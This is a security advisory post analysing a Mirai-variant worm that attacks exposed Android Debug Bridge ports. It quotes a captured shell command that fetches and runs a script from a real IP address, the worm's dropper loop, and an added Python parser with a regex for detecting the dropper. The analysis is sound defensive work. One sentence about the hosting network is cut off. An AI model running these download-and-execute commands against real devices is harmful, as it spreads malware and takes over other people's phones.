
Worm (Mirai?) Exploiting Android Debug Bridge (Port 5555/tcp)

Published: 2018-07-10
Last Updated: 2018-07-10 14:34:35 UTC
by Johannes Ullrich (Version: 1)

Today, I noticed a marked increase in port 5555 scans.

Port 5555 Traffic July 10th 2018

Our honeypot detected odd traffic on this port:

OPEN]+shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; busybox wget hxxp://95 .215 .62.169/adbs -O -> adbs; sh adbs; rm adbs

Note that our honeypot has a web server listening on this port, so it is not going to respond to this sequence. As it turns out, this command is directed at the Android Debug Bridge (ADB), an optional debugging feature of the Android operating system. Recently, researchers discovered that this feature appears to be enabled, and reachable over the network, on some Android phones [1]. ADB provides full shell access to the device, so on such a phone the command above may well be executed.
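To make the captured traffic actionable for a honeypot or sensor, the added example below (not part of the diary) parses the ADB transport header that precedes the OPEN message, checks its magic and byte-sum checksum, and flags a "shell:" destination that follows the same download-and-run pattern as the command above. The header layout and the byte-sum check are the classic ADB wire format; the sample packet is constructed here from the defanged command in the diary.

```python
import re
import struct

# ADB transport header: six little-endian uint32 fields, 24 bytes total
# (command, arg0, arg1, data_length, data_check, magic); magic = ~command.
ADB_HDR = struct.Struct("<6I")
A_OPEN = 0x4E45504F  # the ASCII string "OPEN" read as a little-endian uint32

# Constructed sample: the shell: destination of the OPEN message quoted in the diary
# (URL kept defanged on purpose, exactly as the honeypot logged it).
CAPTURED_CMD = (b"shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; "
                b"busybox wget hxxp://95 .215 .62.169/adbs -O -> adbs; sh adbs; rm adbs\x00")

def adb_open(payload: bytes, local_id: int = 1) -> bytes:
    """Build an ADB OPEN message; used here only to construct test input for the parser."""
    checksum = sum(payload) & 0xFFFFFFFF  # classic ADB data_check: plain byte sum
    hdr = ADB_HDR.pack(A_OPEN, local_id, 0, len(payload), checksum, A_OPEN ^ 0xFFFFFFFF)
    return hdr + payload

def parse_adb_message(buf: bytes):
    """Return (command, payload) or None if buf is not a well-formed ADB message."""
    if len(buf) < ADB_HDR.size:
        return None
    cmd, _arg0, _arg1, length, check, magic = ADB_HDR.unpack_from(buf)
    if magic != cmd ^ 0xFFFFFFFF or len(buf) < ADB_HDR.size + length:
        return None
    payload = buf[ADB_HDR.size:ADB_HDR.size + length]
    if sum(payload) & 0xFFFFFFFF != check:
        return None
    return cmd, payload

# Traits of the first stage seen in the diary: fetch with busybox wget,
# run the download with sh, then delete it to cover tracks.
DROPPER_RE = re.compile(rb"busybox\s+wget\b.*;\s*sh\s+\S+;\s*rm\s+\S+")

def classify_adb_open(buf: bytes) -> dict:
    """Flag an ADB OPEN whose shell: destination looks like a download-and-run dropper."""
    parsed = parse_adb_message(buf)
    if parsed is None or parsed[0] != A_OPEN:
        return {"adb_open": False, "shell": False, "dropper": False}
    dest = parsed[1].rstrip(b"\x00")
    is_shell = dest.startswith(b"shell:")
    return {"adb_open": True, "shell": is_shell,
            "dropper": bool(is_shell and DROPPER_RE.search(dest))}
```

A sensor that speaks ADB only far enough to answer CNXN and then reads OPEN messages can log the extracted destination string, which is the useful artifact here.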

The initial script downloaded:

# $n (list of per-architecture binary names) and $http_server are set earlier
# in the script; that part was not captured here.
for a in $n
do
    cp /system/bin/sh $a                                   # create a placeholder file the shell can write to
    busybox wget http://$http_server/adb/$a -O -> $a       # overwrite it with the downloaded payload
    chmod 777 $a                                           # make it executable for any user
done

for a in $n
do
    rm $a                                                  # clean up once each binary has been launched
done

The script then downloads the actual "worm" binaries for various platforms and attempts to run each of them. A quick analysis of the file via VirusTotal suggests that this is a Mirai variant [2].

The initial download URL appears to be hardcoded into the binary. It does not look like it turns the infected system into a web server to spread the malware. Instead, it just refers to, a data center in Spain (the network was notified via and

Shortly after I downloaded the first binary, the web server became unresponsive. I am not sure if this is due to high load, or due to the ISP taking down the site. VirusTotal has seen related binaries from this host since at least June. Christian Dietrich uploaded a similar binary on June 21st that was received via the more "traditional" telnet attack Mirai uses [3].


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
